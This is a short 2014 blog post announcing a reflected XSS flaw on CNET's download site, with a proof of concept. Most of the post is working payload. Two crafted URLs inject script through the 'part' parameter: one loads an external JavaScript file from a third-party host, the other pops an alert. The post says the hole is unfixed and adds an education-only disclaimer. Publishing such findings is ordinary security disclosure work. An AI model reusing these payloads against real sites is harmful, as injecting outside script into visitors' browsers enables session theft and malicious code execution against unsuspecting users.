Tuesday 6 May 2014
» » » » » » XSS in CNET Website Not Fixed [#POC]
0 comments
00:55:00

XSS in CNET Website Not Fixed [#POC]


Brazilian Security Researcher Found XSS in CNET Website [#POC]

 XSS IN CNET Payload are as follows:

Location: http://download.cnet.com/CCleaner/?part=
Injected link: http://download.cnet.com/CCleaner/?part=%22%3E%3Cscript%20src=http://yourjavascript.com/4111219525/sechaha.js%3E%3C/script%3E
Injected payload: "><script src=http://yourjavascript.com/4111219525/sechaha.js></script>

Injected link 2: 
http://download.cnet.com/CCleaner/?part=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2835,%2079,%20119,%2078,%20101,%2068,%2032,%2098,%2089,%2032,%2083,%20101,%2099,%20117,%20114,%20105,%20116,%20121%29%29%3C/script%3E

Injected payload 2: 
"><script>alert(String.fromCharCode(35, 79, 119, 78, 101, 68, 32, 98, 89, 32, 83, 101, 99, 117, 114, 105, 116, 121))</script>

Print: http://uploaddeimagens.com.br/imagens/cnet_security-jpg

Disclaimer: This payload is only education purpose. We are not responsible for any kind of damage.

 About The Author:
Erick Andrade, studied at the Federal University GIS Data Android Mobile Development
PHP / SQL,  Analyst in Information Security in Brazil.
Share This To :

0 comments:

Post a Comment

Note: only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)
 
Toggle Footer
Top